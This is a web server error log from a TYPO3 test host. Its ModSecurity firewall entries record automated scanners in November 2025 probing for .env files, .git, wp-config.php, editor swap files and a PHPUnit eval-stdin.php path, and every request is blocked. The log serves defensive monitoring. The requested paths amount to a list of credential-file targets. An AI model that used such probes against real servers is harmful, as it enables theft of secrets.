[Sun Nov 16 12:40:59.499991 2025] [authz_core:error] [pid 107823] [client 3.8.102.89:58052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.swp
[Sun Nov 16 12:40:59.503042 2025] [authz_core:error] [pid 107814] [client 3.8.102.89:58056] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.swp
[Sun Nov 16 12:41:12.582149 2025] [authz_core:error] [pid 113276] [client 3.8.102.89:45610] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 16 18:55:53.244552 2025] [:error] [pid 119520] [client 204.76.203.25:49806] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoQKcSmDshT293tVevtdQAAAA8"]
[Sun Nov 16 18:55:53.244899 2025] [:error] [pid 119520] [client 204.76.203.25:49806] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoQKcSmDshT293tVevtdQAAAA8"]
[Sun Nov 16 18:55:53.245069 2025] [:error] [pid 119520] [client 204.76.203.25:49806] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoQKcSmDshT293tVevtdQAAAA8"]
[Sun Nov 16 19:39:58.090127 2025] [:error] [pid 119514] [client 167.71.208.120:19056] [client 167.71.208.120] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoafiBNMh6AcL62fgQqvQAAAAA"]
[Sun Nov 16 19:39:58.090390 2025] [:error] [pid 119514] [client 167.71.208.120:19056] [client 167.71.208.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoafiBNMh6AcL62fgQqvQAAAAA"]
[Sun Nov 16 19:39:58.090563 2025] [:error] [pid 119514] [client 167.71.208.120:19056] [client 167.71.208.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoafiBNMh6AcL62fgQqvQAAAAA"]
[Sun Nov 16 19:39:58.868636 2025] [:error] [pid 119514] [client 167.71.208.120:19056] [client 167.71.208.120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aRoafiBNMh6AcL62fgQqvwAAAAA"]
[Sun Nov 16 19:39:59.926910 2025] [:error] [pid 119514] [client 167.71.208.120:19056] [client 167.71.208.120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aRoafyBNMh6AcL62fgQqwgAAAAA"]
[Sun Nov 16 19:40:01.168315 2025] [authz_core:error] [pid 119514] [client 167.71.208.120:19056] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Nov 17 10:22:31.750209 2025] [:error] [pid 130460] [client 45.139.104.183:34390] [client 45.139.104.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRrpV7NSv_RBfr3rhL--ZQAAAAM"]
[Mon Nov 17 10:22:31.750529 2025] [:error] [pid 130460] [client 45.139.104.183:34390] [client 45.139.104.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRrpV7NSv_RBfr3rhL--ZQAAAAM"]
[Mon Nov 17 10:22:31.750724 2025] [:error] [pid 130460] [client 45.139.104.183:34390] [client 45.139.104.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRrpV7NSv_RBfr3rhL--ZQAAAAM"]
[Wed Nov 19 00:57:55.556681 2025] [:error] [pid 176044] [client 96.41.38.202:59212] [client 96.41.38.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR0IA15xVvPGkpMdKmKiLQAAAAA"]
[Wed Nov 19 00:57:55.558111 2025] [:error] [pid 176044] [client 96.41.38.202:59212] [client 96.41.38.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR0IA15xVvPGkpMdKmKiLQAAAAA"]
[Wed Nov 19 00:57:55.558302 2025] [:error] [pid 176044] [client 96.41.38.202:59212] [client 96.41.38.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR0IA15xVvPGkpMdKmKiLQAAAAA"]
[Wed Nov 19 00:57:55.849012 2025] [authz_core:error] [pid 176044] [client 96.41.38.202:59212] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 19 07:19:03.447866 2025] [authz_core:error] [pid 178793] [client 213.209.157.81:60008] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 19 08:45:36.471600 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn2wAAAAE"]
[Wed Nov 19 08:45:36.473051 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn2wAAAAE"]
[Wed Nov 19 08:45:36.473247 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn2wAAAAE"]
[Wed Nov 19 08:45:36.582315 2025] [authz_core:error] [pid 178793] [client 195.178.110.201:58226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 19 08:45:36.893794 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn3QAAAAE"]
[Wed Nov 19 08:45:36.895250 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn3QAAAAE"]
[Wed Nov 19 08:45:36.895501 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aR11oN9jh_RnrHpMfBTn3QAAAAE"]
[Wed Nov 19 08:45:37.273331 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3gAAAAE"]
[Wed Nov 19 08:45:37.274695 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3gAAAAE"]
[Wed Nov 19 08:45:37.274879 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3gAAAAE"]
[Wed Nov 19 08:45:37.651947 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3wAAAAE"]
[Wed Nov 19 08:45:37.653400 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3wAAAAE"]
[Wed Nov 19 08:45:37.653636 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aR11od9jh_RnrHpMfBTn3wAAAAE"]
[Wed Nov 19 08:45:38.179516 2025] [authz_core:error] [pid 178793] [client 195.178.110.201:58226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Nov 19 08:45:38.548344 2025] [authz_core:error] [pid 178793] [client 195.178.110.201:58226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 19 08:45:38.761448 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aR11ot9jh_RnrHpMfBTn4gAAAAE"]
[Wed Nov 19 08:45:38.762832 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aR11ot9jh_RnrHpMfBTn4gAAAAE"]
[Wed Nov 19 08:45:38.763035 2025] [:error] [pid 178793] [client 195.178.110.201:58226] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aR11ot9jh_RnrHpMfBTn4gAAAAE"]
[Wed Nov 19 08:45:39.014683 2025] [authz_core:error] [pid 178793] [client 195.178.110.201:58226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Wed Nov 19 13:54:31.951724 2025] [authz_core:error] [pid 178792] [client 195.178.110.223:51662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 20 11:23:02.363073 2025] [authz_core:error] [pid 202059] [client 213.209.157.81:59752] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 20 16:00:22.262177 2025] [authz_core:error] [pid 202062] [client 195.178.110.223:35932] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Nov 20 20:29:39.015738 2025] [:error] [pid 214813] [client 2.57.122.173:54716] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR9sI2UkfH1iqAyDHkdqVAAAAAI"]
[Thu Nov 20 20:29:39.016017 2025] [:error] [pid 214813] [client 2.57.122.173:54716] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR9sI2UkfH1iqAyDHkdqVAAAAAI"]
[Thu Nov 20 20:29:39.016207 2025] [:error] [pid 214813] [client 2.57.122.173:54716] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aR9sI2UkfH1iqAyDHkdqVAAAAAI"]
[Fri Nov 21 04:02:22.665057 2025] [authz_core:error] [pid 224162] [client 93.123.109.7:38568] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 21 10:12:31.780978 2025] [:error] [pid 223953] [client 15.223.224.122:35322] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSAs_z27u3u2us0kkkbx_AAAAAE"]
[Fri Nov 21 10:12:31.781236 2025] [:error] [pid 223953] [client 15.223.224.122:35322] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSAs_z27u3u2us0kkkbx_AAAAAE"]
[Fri Nov 21 10:12:31.781837 2025] [:error] [pid 223953] [client 15.223.224.122:35322] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSAs_z27u3u2us0kkkbx_AAAAAE"]
[Fri Nov 21 10:12:32.392093 2025] [:error] [pid 224157] [client 15.223.224.122:35452] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSAtABwVZ0k-ldSnL4rj-gAAAAY"]
[Fri Nov 21 10:12:32.392314 2025] [:error] [pid 224157] [client 15.223.224.122:35452] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSAtABwVZ0k-ldSnL4rj-gAAAAY"]
[Fri Nov 21 10:12:32.392505 2025] [:error] [pid 224157] [client 15.223.224.122:35452] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSAtABwVZ0k-ldSnL4rj-gAAAAY"]
